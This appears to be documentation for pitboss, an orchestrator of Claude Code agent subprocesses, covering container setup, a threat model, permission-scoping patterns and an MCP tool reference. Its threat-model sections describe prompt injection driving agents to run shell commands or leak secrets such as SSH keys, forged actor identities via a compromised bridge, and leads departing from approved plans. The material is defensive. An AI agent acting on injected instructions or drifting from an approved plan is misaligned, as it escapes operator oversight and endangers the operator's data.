ghcr.io/sds-mode/pitboss | Pitboss binaries only | You want to mount or install claude yourself, or you’re layering pitboss into an existing base image. |
ghcr.io/sds-mode/pitboss-with-claude | Pitboss + pinned Claude Code CLI | You want a self-contained image you can pull and run. |
Both images are multi-arch (linux/amd64 + linux/arm64) and follow the same tag scheme (:latest, semver tags, :main).
The bundled image pins a specific Claude Code version. To check it at runtime:
podman inspect ghcr.io/sds-mode/pitboss-with-claude:latest \
--format '{{index .Config.Labels "ai.anthropic.claude-code.version"}}'
Linux host: mount ~/.claude
Claude Code on Linux stores OAuth tokens at ~/.claude/.credentials.json. The bundled container reads credentials from /home/pitboss/.claude (via CLAUDE_CONFIG_DIR), so bind-mounting your host’s ~/.claude Just Works:
# One-time on the host:
claude login
# Every pitboss run:
podman run --rm --userns=keep-id \
-v "$HOME/.claude:/home/pitboss/.claude:rw,z" \
-v "$PWD/manifest.toml:/run/pitboss.toml:ro,z" \
ghcr.io/sds-mode/pitboss-with-claude:latest \
pitboss dispatch /run/pitboss.toml
Why --userns=keep-id?
Rootless podman runs the container in a user namespace. Without --userns=keep-id, your host UID 1000 maps to in-container UID 0 (fake root), and the bundled pitboss user (container UID 1000) maps to a different host subuid — the mounted credentials look root-owned to the in-container pitboss user and become unreadable. --userns=keep-id aligns the mapping so host UID 1000 maps directly to container UID 1000.
If you’re running Docker instead of rootless podman, skip the flag: Docker doesn’t use user namespaces by default, so mounted files’ UIDs pass through unchanged. Use -u "$(id -u):$(id -g)" there if your host UID isn’t 1000.
Why the :z flag?
On SELinux-enforcing distros (Fedora, RHEL, CentOS, Rocky), a bind mount without a label is unreadable from the container. The :z flag tells podman/docker to apply a shared SELinux label so the container can read the mount. Ubuntu and Debian operators can omit it.
Important: ALL bind mounts need :z, not just ~/.claude. Missing :z on the manifest mount is a common footgun — it produces a cryptic Permission denied (os error 13) from pitboss at manifest-read time.
macOS host: Keychain can’t be mounted
On macOS, claude stores OAuth tokens in the system Keychain — not in ~/.claude/. The Keychain isn’t mountable into a container. Two fallbacks:
Option A: API key
If you have a standalone Anthropic API key (pay-as-you-go, separate from a Claude subscription):
docker run --rm \
-e ANTHROPIC_API_KEY="$ANTHROPIC_API_KEY" \
-v "$PWD/manifest.toml:/run/pitboss.toml:ro" \
ghcr.io/sds-mode/pitboss-with-claude:latest \
pitboss dispatch /run/pitboss.toml
Option B: Persistent named volume
Run claude login inside the container once to authenticate via OAuth, store the result in a named volume, then reuse that volume for subsequent runs:
# One-time: interactive login inside a persistent volume
docker volume create pitboss-claude-auth
docker run --rm -it \
-v pitboss-claude-auth:/home/pitboss/.claude \
ghcr.io/sds-mode/pitboss-with-claude:latest \
claude login
# Every run:
docker run --rm \
-v pitboss-claude-auth:/home/pitboss/.claude \
-v "$PWD/manifest.toml:/run/pitboss.toml:ro" \
ghcr.io/sds-mode/pitboss-with-claude:latest \
pitboss dispatch /run/pitboss.toml
Podman vs Docker
podman run and docker run with the arguments above behave equivalently for pitboss’s purposes. Key differences operators hit:
- Rootless podman uses user namespaces → needs
--userns=keep-id(see above). - Docker by default creates iptables rules that bypass UFW on Linux hosts. Podman’s
netavark/slirp4netnsstack respects the host firewall. - SELinux: both honor the
:z/:Zmount flags identically.
Recommend podman for Linux operators who care about firewall enforcement; Docker is simpler for macOS (Docker Desktop) and Windows (WSL2 backend).
Updating the bundled Claude version
The bundled image pins a specific Claude Code version in CI. To consume a newer version:
- Open an issue or PR at https://github.com/SDS-Mode/pitboss to bump
CLAUDE_CODE_VERSIONin.github/workflows/container.yml. - Once merged, a new container release rebuilds with the updated version.
For local/one-off use with a different version:
podman build --target=with-claude \
--build-arg CLAUDE_CODE_VERSION=<version> \
-t pitboss-with-claude:custom .
Troubleshooting
“Not logged in” / auth error
Check on the host: claude --version should work and ls ~/.claude/.credentials.json should exist. If the file is missing, run claude login on the host.
“Permission denied” reading credentials in rootless podman
Add --userns=keep-id. Rootless podman’s default UID namespace maps host UID to in-container UID 0 — see the “Why --userns=keep-id?” section.
“Permission denied (os error 13)” reading the manifest
The manifest bind mount is missing :z. Add it: -v "$PWD/manifest.toml:/run/pitboss.toml:ro,z". All bind mounts on SELinux-enforcing hosts need :z, not just ~/.claude.
SELinux AVC denials in the host audit log
Same cause as above — bind mounts need :z or :Z. :z applies a shared label (compatible across containers). :Z applies a private label (prevents other containers from reading the same mount).
Token refresh failure after a long-running dispatch
OAuth tokens rotate. If the container started with a valid token that expired mid-run, the refresh write-back needs UID alignment (--userns=keep-id on rootless podman, or matching -u on Docker). Re-run with the correct flag.
Threat model
This page frames pitboss’s attack surface honestly. It is aimed at operators evaluating whether pitboss fits a security-sensitive deployment, and at leads designed to process external content.
What pitboss is
Pitboss is an orchestrator. It:
- Spawns
claudesubprocesses, one per worker or lead, with a specific prompt and tool set. - Captures their stream-JSON output, persists structured artifacts per run, and exposes a small MCP socket on a Unix domain socket.
- In hierarchical mode, lets a lead dynamically spawn additional workers and sub-leads at runtime.
That is the complete list. Pitboss is not a sandbox, not a content filter, not an identity provider.
What pitboss is NOT
Not a runtime jail. If a worker is given Bash in its tools list, it can run arbitrary shell commands as the OS user that launched pitboss. Pitboss does not interpose on subprocess execution, does not apply seccomp profiles, and does not restrict filesystem access beyond what the OS already enforces.
Not an auth/identity provider. The MCP socket is unauthenticated. Pitboss assumes the only process connecting to the MCP socket is the claude subprocess it spawned. There is no per-request credential, no session token, no verification that the connecting client is the expected worker. Do not expose the MCP socket to other processes.
Not a content filter. Pitboss does not inspect what a worker reads, what it writes, or what it outputs. If a worker’s Bash call exfiltrates data to an external endpoint, pitboss will faithfully log the command in stdout.log after the fact — it will not prevent it.
Not an egress firewall. Pitboss makes no network-level restrictions on what the host or workers can contact. Workers with Bash or WebFetch can reach any endpoint reachable from the host.
Risks specific to LLM-orchestrated work
Prompt injection
A worker that reads external content — web pages, user-submitted documents, output from a previous worker that itself processed untrusted input — is exposed to prompt injection. Malicious content in that input can manipulate the worker’s subsequent behavior.
The severity depends on the worker’s tool set:
- Read-only tools only — an injected instruction can cause the worker to produce a misleading report. The damage is informational.
- Write or Edit tools — an injected instruction can cause the worker to modify files on the operator’s filesystem.
- Bash — an injected instruction can cause the worker to run arbitrary shell commands. There is no pitboss-level defense against this. Mitigation is tool restriction: workers that process untrusted input should not have
Bash.
Pitboss does not prevent prompt injection. The mitigation available to operators is scoping tool permissions so that a successfully injected worker cannot take state-changing actions. See The Rule of Two for the framework and Defense-in-depth patterns for concrete manifest recipes.
Runaway cost
A misbehaving lead — whether from a model error, a prompt-injected instruction, or a bug in the lead’s own prompt — can spawn workers continuously. The budget_usd and max_workers fields on [run] and per-sublead envelopes are the primary defense. Without them, cost is unbounded. The budget_usd cap is enforced via reservation accounting: spawn_worker fails before launch once spent + reserved + next_estimate > budget.
Capability escalation through chained tools
A worker with Read and Write can be tricked into discovering secrets in one location and writing them to another. A worker that reads ~/.ssh/id_rsa and writes to a world-readable output directory has effectively exfiltrated a key. The worker does not need Bash to do this — Read + Write is sufficient.
Tool restrictions should be designed with the worst-case injected instruction in mind, not the happy-path prompt.
Sensitive data exposure through observability paths
Workers emit stream-JSON to stdout. The TUI renders live log output per worker. If a worker’s output contains sensitive content (credentials it discovered, PII from files it read), that content may appear in:
tasks/<id>/stdout.login the run directory- The TUI’s tile grid and log pane
- Any webhook notification payloads if
notificationsare configured withinclude_output
Token and cost data is reported in stream-JSON for every worker. Operators should treat run directories as potentially sensitive artifacts.
Plan-to-action drift
When require_plan_approval = true, a lead must have a propose_plan approved before spawn_worker calls are permitted. However, the approval gates the plan text, not every subsequent action. The lead can behave differently when actually spawning workers than it described in the plan. Approval is a checkpoint, not a binding constraint. Operators who need tighter control over individual spawns should use request_approval calls before significant actions, not just propose_plan.
What is in your trust boundary
The following are inside your trust boundary as operator:
- The
claudebinary and Anthropic’s API. Pitboss trusts the output ofclaudesubprocesses to be honest (not itself adversarial). - The host you run pitboss on, including the filesystem, environment variables, and network stack.
- The manifest you write. Pitboss executes it as specified; it does not attempt to validate that your prompts are safe.
- Any HTTP endpoints configured in
[notifications]. Pitboss will POST to them; ensure they are trusted and require no authentication that you’d rather not expose in the manifest.
Internal trust surfaces
Pitboss has two processes that talk to each other over an unauthenticated Unix domain socket:
- The dispatcher (
pitboss dispatch). Holds run state, routes MCP tool calls to the correct layer, enforces policy. - The MCP bridge (
pitboss mcp-bridge <socket>). A small stdio↔socket adapter invoked byclaudevia--mcp-config. Stamps each incoming MCP request with a_metafield describing which actor (root lead, sub-lead, worker) originated it.
The dispatcher trusts the bridge’s _meta.actor_id and _meta.actor_role fields. These values are used as index keys into layer-routing maps (subleads, worker_layer_index) and as the basis for ActorPath on approval requests. This has two consequences:
If the bridge is compromised, actor identity is forgeable
An attacker with the ability to inject MCP requests over the dispatcher’s socket — or to replace the pitboss mcp-bridge binary before it starts — can stamp arbitrary actor_id / actor_role pairs. The dispatcher will route those requests as if they came from that actor. Concretely, a compromised bridge can:
- Elevate a worker to a sub-lead. A worker-originated request stamped as
actor_role = "sublead"bypasses the depth-2 spawn cap (workers are terminal; sub-leads can spawn more workers). - Cross-tree access. A sub-tree worker stamped with a peer sub-lead’s
actor_idcan read/peer/<peer>/*entries it is not supposed to see. - Approval redirection. Approval requests are routed by
actor_path; a mislabeled approval will surface to the operator under the wrong originator, potentially misleading approve/reject decisions.
Mitigations currently in place
- Socket permissions. The dispatcher creates the MCP socket with restrictive permissions (owner-only) in the run directory, which is typically under
~/.local/share/pitboss/runs/<run-id>/. Any process running as your host user can still connect; a process running as a different user cannot. - Role-shape validation. The dispatcher rejects syntactically invalid
_metapayloads (e.g.actor_role = "sublead"without a matching registeredactor_id), which closes some but not all misuse paths. - Worker-sent requests that target sub-lead-only tools are rejected regardless of
_meta, because sub-lead-only tools are not in the worker’s--allowedToolslist passed to the claude subprocess.
What is NOT mitigated
- A bridge binary replaced on disk before the dispatcher invokes it. Verify the binary path you configure in any shared-tooling setup.
- A local attacker with the same UID as the pitboss process. Pitboss assumes single-user-on-host; multi-tenant deployments require an external wrapper.
Planned hardening (tracked for a future phase)
- Bridge-auth secret. A per-run secret the dispatcher generates, passes to the bridge at launch via a non-inherited channel, and requires the bridge to HMAC over
_metafields. Would cryptographically prevent forged identities from an unauthenticated connector even if an attacker reaches the socket.
Operators deploying pitboss in security-sensitive contexts should treat the bridge and dispatcher as a single trust unit and harden the host boundary (single-user host, restricted OS account, standard filesystem permissions on the runs directory) rather than relying on internal checks.
What pitboss does not provide (operator responsibilities)
| Gap | Operator action |
|---|---|
| Egress filtering | Firewall the host. Pitboss workers have full network access if Bash or WebFetch are allowed. |
| Per-tool-invocation audit log | Pitboss produces one TaskRecord per worker (in summary.jsonl), not a per-tool-call log. If you need a record of every Bash invocation, you need a wrapper or a Claude-level audit hook. |
| Argument validation on tool calls | --allowedTools restricts which tools a worker may call, but not the arguments. A worker with Write can write to any path writable by the pitboss process user. |
| Secrets management | Do not put API keys or credentials in the manifest. Use env vars in [defaults].env or source them from the environment. The manifest is written verbatim to manifest.snapshot.toml in the run directory. |
| Identity / multi-tenancy | Pitboss assumes the operator is the only authenticated user. The MCP socket, TUI, and approval queue have no per-user access control. Multi-tenant deployments require an external wrapper. |
Next: The Rule of Two — a framework for scoping worker tool permissions based on what each worker processes and touches.
The Rule of Two
The Rule of Two is a recognized pattern in AI agent design: an agent should hold AT MOST TWO of the following three properties at once:
- (A) Untrusted input — the agent reads content that was not authored by the operator.
- (B) Sensitive data access — the agent can read secrets, customer PII, internal-only documents, or anything the operator would not post publicly.
- (C) State-changing actions — the agent can take actions that modify state outside its own conversation: writing files, running shell commands, calling external APIs, sending notifications.
Each pair has known failure modes. All three together is unsafe by default.
This page applies the Rule of Two to pitboss manifest design.
Defining the terms in pitboss context
Untrusted input is anything a worker reads that the operator did not author:
- External documents or web pages retrieved via
WebFetch - User-submitted content passed via the prompt or a shared-store entry
- The output of another worker that itself processed untrusted input (injection can propagate through worker chains)
- Files in a repository where external contributors have write access
Sensitive data is any information that should not be publicly visible:
- Credentials and API keys (even if stored as env vars, a worker with
Readcould discover them if they’re also present in files) - Customer or user PII
- Internal architecture documents, unreleased roadmap data, proprietary source code
- Anything the operator would not include in a public bug report
State-changing actions in pitboss correspond to specific tool grants:
Write,Edit,NotebookEdit— modify files on the operator’s filesystemBash— run arbitrary shell commands (the broadest capability; subsumes most others)- Custom MCP tools that trigger external side effects (deploy pipelines, notification endpoints, databases)
Tool grants are set via the tools = [...] field on [defaults], [[task]], [[lead]], or in the spawn_worker call’s tools argument.
The three permitted pairs
| Pair | What it means | Known failure mode |
|---|---|---|
| A + C (untrusted input + state-changing, no sensitive data) | Worker processes external content and can write output, but has no access to sensitive data. | Injected instructions can corrupt output files or trigger external actions; they cannot read secrets. |
| B + C (sensitive data + state-changing, no untrusted input) | Worker touches internal data and can act on it, but reads only operator-authored prompts and trusted internal data. | Bugs or model errors can cause incorrect mutations; external injection is not a path because the worker never reads untrusted content. |
| A + B (untrusted input + sensitive data, no state-changing) | Worker reads external content alongside internal data but cannot write or act. | Can produce misleading reports if injected; cannot modify state. This is the lead-as-evaluator pattern. |
A + C: untrusted input plus state-changing actions
Use this pair for workers that process external sources and write their output somewhere, but that do not need access to sensitive internal data.
[[task]]
id = "scrape-and-summarize"
directory = "/output/public"
tools = ["WebFetch", "Read", "Write", "Glob"]
prompt = """
Fetch the URLs in urls.txt. Write a summary of each to summaries/.
Do not read files outside this directory.
"""
The worker can be injected, but an injected instruction can only write to the output directory and fetch URLs. It cannot read ~/.ssh/, env vars, or any file not under /output/public. Limit directory tightly and restrict Read to paths within it.
B + C: sensitive data plus state-changing actions
Use this pair for workers that act on internal data only — your own repository, your own credentials (passed via env), your own infrastructure. These workers must never read untrusted external content.
[[task]]
id = "apply-refactor"
directory = "/internal/repo"
tools = ["Read", "Write", "Edit", "Glob", "Grep"]
prompt = """
Apply the refactor described in /internal/repo/PLAN.md.
Do not fetch external URLs or read paths outside this repository.
"""
There is no WebFetch or Bash here. The prompt is fully operator-authored. There is no external input path for injection. The risk is model error, not injection — which is mitigated by review (plan approval, approval-gated writes) rather than tool restriction.
A + B: untrusted input plus sensitive data (no state-changing)
This is the lead-as-evaluator pattern. A read-only lead (or worker) ingests external content and internal context simultaneously, but cannot act. Its output is a report or recommendation — the operator (or a separate write-capable worker) decides whether to act on it.
[[lead]]
id = "evaluator"
directory = "/internal/repo"
tools = ["Read", "Glob", "Grep"]
prompt = """
Read the user-submitted PR description in /tmp/pr-body.txt.
Read the affected source files in this repo.
Produce a structured review report to stdout.
Do not spawn workers that have Write or Bash.
"""
No Write, Edit, or Bash. An injected instruction in pr-body.txt can only affect what the report says — it cannot modify the repository.
Wiring the Rule of Two in a pitboss manifest
Tool restrictions per worker
Set tools at [defaults] for a baseline, then tighten per-task or per-lead:
[defaults]
# Baseline: read-only
tools = ["Read", "Glob", "Grep"]
[[lead]]
id = "root"
# The root lead only needs to read and coordinate
tools = ["Read", "Glob", "Grep"]
# Spawn workers with expanded tools only when explicitly needed:
# spawn_worker(prompt = "...", tools = ["Read", "Write", "Edit"])
The tools argument on spawn_worker overrides the per-task default for that worker. See Manifest schema for the field reference.
Sub-leads as isolation envelopes
A sub-lead’s budget_usd and max_workers cap what the sub-tree can consume, but isolation also comes from the KV layer boundary and read_down = false. Sub-leads with different Rule-of-Two profiles should not have read_down = true pointing at each other.
# Untrusted-input sub-tree: small budget, no read-down into trusted tree
spawn_sublead(
prompt = "Process the user-submitted documents in /tmp/uploads/...",
budget_usd = 0.50,
max_workers = 2,
read_down = false
)
Approval policy as a gate on state-changing tools
Use [[approval_policy]] to require operator review before any state-changing tool invocation. This does not prevent state changes — it gates them on explicit approval:
# Auto-approve reads; block anything that writes or runs commands
[[approval_policy]]
match = { category = "tool_use", tool_name = "Read" }
action = "auto_approve"
[[approval_policy]]
match = { category = "tool_use", tool_name = "Grep" }
action = "auto_approve"
[[approval_policy]]
match = { category = "tool_use" }
action = "block"
See Defense-in-depth patterns → Approval-gated state-changing tools for a complete example.
The lead-as-evaluator pattern in detail
The lead-as-evaluator splits the A+B pair from the C property by using separate actors:
- Evaluator lead — holds A+B, no C. Reads external content + internal data, produces a structured plan. Tool set:
["Read", "Glob", "Grep"]. - Action worker — holds B+C, no A. Receives only the evaluator’s plan (operator-reviewed, operator-authored at the point of handoff). Tool set:
["Read", "Write", "Edit"]or["Bash"].
The handoff goes through the operator approval queue. The evaluator’s propose_plan output is reviewed before any write-capable worker is spawned. See Defense-in-depth patterns for a runnable manifest.
Common violations and their consequences
| Violation | Consequence |
|---|---|
Giving Bash to a worker that reads user-submitted content | Arbitrary shell execution on the host if the content contains an injected instruction |
Passing secrets via the prompt or /ref/* to a worker that reads external URLs | Secrets exfiltrated if the worker is injected |
Running a depth-2 sub-lead with read_down = true that also processes untrusted input | Root KV contents visible to an injected sub-tree |
Not setting budget_usd on a hierarchical run that could receive externally-triggered work | Unbounded cost if the lead is manipulated into spawning continuously |
See also:
- Threat model — what pitboss does and does not defend against
- Defense-in-depth patterns — runnable manifest recipes for each of these patterns
- Manifest schema →
tools—toolsfield reference - Approvals —
[[approval_policy]]reference
Defense-in-depth patterns
Each pattern below maps to a specific pitboss feature. For each one: what threat it addresses, a minimal manifest snippet, and what it does not cover.
1. Read-only lead, write-capable worker
Addresses: Prompt injection in the evaluation phase. The lead reads and reasons; workers act only after operator review.
This is the lead-as-evaluator pattern from The Rule of Two. The lead holds (A+B) — it may read untrusted content alongside internal data — but has no Write, Edit, or Bash. Workers hold (B+C) but receive only an operator-reviewed plan.
[run]
max_workers = 4
budget_usd = 5.00
require_plan_approval = true
[[lead]]
id = "evaluator"
directory = "/repo"
tools = ["Read", "Glob", "Grep"]
prompt = """
Read the user-submitted spec in /tmp/spec.md and the existing codebase.
Produce a plan via propose_plan listing every file to change and why.
Do not spawn workers until the plan is approved.
"""
When the lead calls propose_plan, the TUI surfaces it for operator review. Only after the operator approves does spawn_worker become permitted. The operator can reject with a reason, and the lead can revise.
Workers are spawned with explicit tool grants at spawn time:
# Example lead prompt continues:
# spawn_worker(
# prompt = "Implement the plan. Write only to the paths listed.",
# tools = ["Read", "Write", "Edit", "Glob", "Grep"]
# )
What this does not cover: The operator approves the plan text, not every individual write. A worker that implements the approved plan can still make incorrect edits within that scope. Use per-write request_approval calls (pattern 3) if you need individual write approval.
2. Untrusted input quarantine via sub-leads
Addresses: Prompt injection in an externally-sourced sub-task propagating to the rest of the run.
A sub-lead that processes untrusted external content is given a bounded envelope and strict KV isolation. Its workers have no Write or Bash. Findings return only through Event::Result — the root lead reads the result, decides what (if anything) to do with it.
[run]
max_workers = 8
budget_usd = 10.00
lead_timeout_secs = 3600
[[lead]]
id = "root"
allow_subleads = true
max_subleads = 3
directory = "/repo"
tools = ["Read", "Glob", "Grep"]
prompt = """
For each URL in /tmp/urls.txt, spawn a sub-lead to fetch and summarize it.
Use budget_usd = 0.50 and max_workers = 2 per sub-lead.
Set read_down = false on each sub-lead.
After all sub-leads finish, read their terminal results and produce a
combined report. Do not pass any sub-lead's raw output directly to another.
"""
[lead.sublead_defaults]
budget_usd = 0.50
max_workers = 2
lead_timeout_secs = 300
read_down = false
Each sub-lead spawned for external URLs gets:
budget_usd = 0.50— cost cap per external documentread_down = false— the root lead cannot see the sub-lead’s KV store, so a sub-lead cannot smuggle injected data into/ref/*that root then acts on- Workers with read-only tools only (configured by the sub-lead’s own prompt)
The sub-lead’s workers might have:
# Sub-lead spawns workers like:
# spawn_worker(
# prompt = "Fetch the URL and write a 3-bullet summary. Nothing else.",
# tools = ["WebFetch", "Read"]
# )
What this does not cover: The sub-lead’s Event::Result text is itself untrusted output — an injected worker could craft a malicious result. The root lead that reads results is read-only, so injected result content can affect the root’s report but not cause write actions directly. Apply pattern 3 or pattern 1 on top if root needs to act on the results.
3. Approval-gated state-changing tools
Addresses: Unreviewed file writes or shell commands. Every state-changing tool invocation surfaces to the operator before executing.
Use [[approval_policy]] to auto-approve cheap read operations and block all writes and shell invocations:
[run]
max_workers = 4
budget_usd = 8.00
approval_policy = "block"
# Auto-approve reads (high volume, low risk)
[[approval_policy]]
match = { category = "tool_use", tool_name = "Read" }
action = "auto_approve"
[[approval_policy]]
match = { category = "tool_use", tool_name = "Glob" }
action = "auto_approve"
[[approval_policy]]
match = { category = "tool_use", tool_name = "Grep" }
action = "auto_approve"
# Block all other tool-use (Write, Edit, Bash, etc.) for operator review
[[approval_policy]]
match = { category = "tool_use" }
action = "block"
Rules are evaluated first-match-wins. Read, Glob, and Grep are auto-approved. Any other tool-use — including Write, Edit, Bash, and any custom MCP tool — blocks for operator review.
What this does not cover: [[approval_policy]] is not argument-aware. It gates whether Write is invoked, not which path the Write targets. Combine with tight directory scoping and read-only leads (pattern 1) for path-level control.
See Approvals for the full policy model.
4. Cost firewall via per-sub-lead envelopes
Addresses: A prompt-injected sub-tree spawning unbounded workers and consuming unbounded budget.
Each sub-lead spawned for externally-triggered work gets a budget cap enforced at the dispatcher level. Even if the sub-lead is injected with an instruction to spawn 100 workers, the envelope enforces the cap before any worker is launched.
[run]
max_workers = 20
budget_usd = 50.00
lead_timeout_secs = 7200
[[lead]]
id = "root"
allow_subleads = true
max_subleads = 10
max_sublead_budget_usd = 1.00 # hard cap: no sub-lead can get more than $1
max_workers_across_tree = 16
directory = "/repo"
prompt = """
For each incoming task in /tmp/queue.json, spawn a sub-lead with
budget_usd = 0.50, max_workers = 2, read_down = false.
"""
[lead.sublead_defaults]
budget_usd = 0.50
max_workers = 2
lead_timeout_secs = 600
read_down = false
max_sublead_budget_usd = 1.00 means a root lead cannot grant a sub-lead more than $1.00 even if it tries. The [lead.sublead_defaults] sets the default to $0.50. The combination caps per-task cost at $0.50 with a hard ceiling of $1.00.
When a sub-lead hits its budget_usd ceiling, spawn_worker returns budget exceeded and the sub-lead terminates (or handles the error, if its prompt instructs it to). The root lead receives the sub-lead’s terminal result and can decide whether to alert.
Configure [notifications] with budget_alert_threshold_pct to receive a webhook when any actor reaches a configured percentage of its budget.
What this does not cover: Budget caps do not prevent a sub-lead from using its full envelope on a single expensive operation. They cap total spend, not per-operation cost.
5. Run-global lease as serialization gate
Addresses: Multiple agents concurrently modifying a sensitive shared resource (a deploy pipeline, a credential store, a shared output file) and corrupting it through interleaved writes.
Require a run-global lease before any agent touches the shared resource. Only one agent at a time holds the lease; the rest wait or fail fast. The lease auto-releases if the holder crashes, so a dead agent cannot hold the lock indefinitely.
[run]
max_workers = 8
budget_usd = 20.00
[[lead]]
id = "root"
directory = "/deploy"
allow_subleads = true
prompt = """
For each service in services.txt:
1. Call run_lease_acquire("deploy.lock", ttl_secs=300) — wait up to 60s.
2. Perform the deploy steps.
3. Call run_lease_release(lease_id).
If acquire times out, report the service as skipped and continue.
"""
The ttl_secs = 300 ensures that if the deploy worker crashes mid-deploy, the lease expires after 5 minutes and the next actor can proceed. Do not set ttl_secs longer than the maximum acceptable stall duration.
run_lease_acquire is the run-global variant. For resources internal to a single sub-tree, use lease_acquire instead. See Leases & coordination for when to use each.
What this does not cover: Leases serialize access but do not validate what the holder does during the lease. A holder that writes corrupt data will not be detected by the lease mechanism. Combine with plan approval (pattern 1) for write validation.
6. TTL + auto-reject fallback
Addresses: An approval that the operator cannot reach (off-hours, disconnected TUI, operational incident) stalling the run indefinitely — and then being approved automatically when the operator reconnects without reviewing the context.
Set a TTL on approval requests. When the TTL expires without a response, fallback = "auto_reject" causes the request to be rejected rather than queued for later approval.
[run]
max_workers = 4
budget_usd = 10.00
# Default: block approvals if no TUI connected
approval_policy = "block"
The lead’s prompt instructs it to pass a TTL on sensitive requests:
# In the lead's prompt:
# request_approval(
# summary = "About to run the deploy script for prod.",
# timeout_secs = 300,
# plan = {
# summary = "Run deploy.sh in /deploy/prod",
# risks = ["Deploys to production; irreversible without rollback procedure"],
# rollback = "Run deploy.sh --rollback"
# }
# )
#
# The lead prompt should handle rejection:
# If rejected or timed out, abort this task and report why.
To set a run-level fallback on all approval requests, combine the TTL with [[approval_policy]]:
# Block all approvals; set a cost-over firewall for large events
[[approval_policy]]
match = { category = "cost", cost_over = 1.00 }
action = "block"
Operator-side: if you expect off-hours runs where the TUI may be unattended, set approval_policy = "auto_reject" in [run] as the baseline. Approvals that aren’t explicitly auto-approved by a policy rule will reject rather than queue indefinitely.
What this does not cover: Auto-reject stops the action but does not roll back work already done. For actions that should be atomic (approve before any work or none), use propose_plan with require_plan_approval = true before any workers are spawned.
What you still need to provide
These are operator responsibilities that pitboss does not address:
Egress filtering. Firewall the host. Workers with Bash or WebFetch can reach any endpoint reachable from the OS. Pitboss makes no network-level restrictions.
Secrets handling. Do not put API keys or credentials in the manifest. Use [defaults].env to pass secrets from the environment, or use a secrets manager. The manifest is written verbatim to manifest.snapshot.toml in the run directory.
Per-tool-invocation audit log. Pitboss produces one TaskRecord per worker (summary.jsonl), not a per-tool-call log. If you need a record of every Bash invocation or every path written to, you need a process-level audit hook or a claude-level wrapper.
Identity and access control. Pitboss assumes the operator is the only user. The MCP socket, TUI, and approval queue have no per-user access control. Multi-tenant deployments require an external wrapper.
See also:
- Threat model — full list of what pitboss does and does not defend against
- The Rule of Two — framework for deciding which tools each worker should have
- Approvals — full
[[approval_policy]]reference - Leases & coordination — per-layer vs. run-global leases
- Depth-2 sub-leads — sub-lead envelope and isolation model
MCP Tool Reference — Overview
In hierarchical mode, pitboss starts an MCP server on a unix socket and auto-generates an --mcp-config for the lead’s claude subprocess. All tools in this reference are automatically added to the lead’s --allowedTools list — the operator does not list them explicitly.
Workers get a narrower toolset (shared-store tools only; no spawn_worker, no spawn_sublead).
Tool categories
| Category | Page | Who can call |
|---|---|---|
| Session control | Session control | Lead only (root lead) |
| Coordination & state | Coordination & state | Lead + workers |
| Approvals | Approvals | Lead only |
MCP tool name prefix
All pitboss tools are prefixed mcp__pitboss__. In prompts and --allowedTools lists, use the full name:
mcp__pitboss__spawn_worker
mcp__pitboss__kv_get
mcp__pitboss__request_approval
Structured content wrapper
All tool responses are wrapped in a record ({ entry: ... }, { entries: [...] }, { workers: [...] }, etc.). Claude Code’s MCP client requires structuredContent to be a record, not a bare array or null. Unwrap one level when reading results in a lead prompt.
The bridge
Claude Code’s MCP client speaks stdio. The pitboss MCP server listens on a unix socket. Between them is pitboss mcp-bridge <socket> — a stdio-to-socket proxy auto-launched via the lead’s generated --mcp-config. You never invoke it directly.
Error patterns
| Error | Meaning | Recovery |
|---|---|---|
budget exceeded: $X spent + $Y reserved + $Z estimated > $B budget | Not enough budget headroom to spawn | Finish existing work; surface to operator if needed |
worker cap reached: N active (max M) | Too many live workers | Wait for one to finish via wait_for_worker or wait_for_any |
run is draining: no new workers accepted | Operator Ctrl-C’d or lead was cancelled | Finish gracefully; don’t spawn new work |
unknown task_id | Typo or referring to an unspawned worker | Call list_workers to see what’s registered |
SpawnFailed | Worker never started (worktree prep failure, branch conflict, non-git directory) | Check stderr log |
plan approval required: call propose_plan ... | require_plan_approval = true and no approved plan yet | Call propose_plan and wait for approval |
Full canonical reference
AGENTS.md in the source tree is the authoritative machine-readable reference for all tool schemas. The pages in this section derive from it and highlight the most important fields for human readers. If anything here conflicts with the binary’s actual behavior, the binary wins — file a PR against this book.
Session control tools
These tools are available to the root lead only. Sub-lead leads can call spawn_worker (for their own workers) but not spawn_sublead (depth-2 cap enforced at both the MCP handler and the sub-lead’s --allowedTools).
spawn_worker
Spawn a new worker subprocess with a given prompt.
Args:
{
"prompt": "string (required)",
"directory": "string (optional, defaults to lead's directory)",
"branch": "string (optional, auto-generated if omitted)",
"tools": ["string"] ,
"timeout_secs": 600,
"model": "claude-haiku-4-5"
}
Returns: { "task_id": "string", "worktree_path": "string or null" }
Rules:
promptis required.directorydefaults to the lead’sdirectory.modeldefaults to the lead’s model. Override per-worker when you need a heavier worker (Sonnet or Opus) under a Haiku lead.toolsdefaults to the lead’stools.- Fails with
budget exceededifspent + reserved + next_estimate > budget_usd. - Fails with
worker cap reachedif the number of live workers equalsmax_workers. - Fails with
plan approval requiredifrequire_plan_approval = trueand no plan has been approved yet.
spawn_sublead (v0.6+, root lead only)
Spawn a sub-lead with its own Claude session, budget envelope, and isolated coordination layer.
Args:
{
"prompt": "string (required)",
"model": "string (required)",
"budget_usd": 2.00,
"max_workers": 4,
"lead_timeout_secs": 1800,
"initial_ref": { "key": "value" },
"read_down": false
}
Returns: { "sublead_id": "string" }
- Available only when
allow_subleads = truein the manifest. budget_usdandmax_workersare required unlessread_down = true.initial_refseeds the sub-lead’s/ref/*namespace at spawn time.- Fails if
budget_usd > max_sublead_budget_usd(manifest cap enforcement, pre-state).
wait_actor (v0.6+)
Wait for any actor (worker or sub-lead) to settle. Generalizes wait_for_worker.
Args: { "actor_id": "string", "timeout_secs": 120 }
Returns: ActorTerminalRecord — either { "Worker": TaskRecord } or { "Sublead": SubleadTerminalRecord } depending on actor type.
wait_for_worker is retained as a back-compat alias; it unwraps the Worker variant.
wait_for_worker
Block until a specific worker settles (back-compat alias for wait_actor on worker ids).
Args: { "task_id": "string", "timeout_secs": 120 }
Returns: Full TaskRecord when the worker settles.
wait_for_any
Block until the first of a list of workers settles.
Args: { "task_ids": ["string"], "timeout_secs": 120 }
Returns: { "task_id": "string", "record": TaskRecord } — the first to finish.
worker_status
Non-blocking peek at a worker’s current state.
Args: { "task_id": "string" }
Returns: { "state": "Running|Paused|Frozen|Done|...", "started_at": "...", "partial_usage": {...}, "last_text_preview": "...", "prompt_preview": "..." }
list_workers
Snapshot of all active and completed workers.
Args: {}
Returns: { "workers": [{ "task_id": "string", "state": "...", "prompt_preview": "...", "started_at": "..." }, ...] }
cancel_worker
Signal a worker’s cancel token, terminating the subprocess.
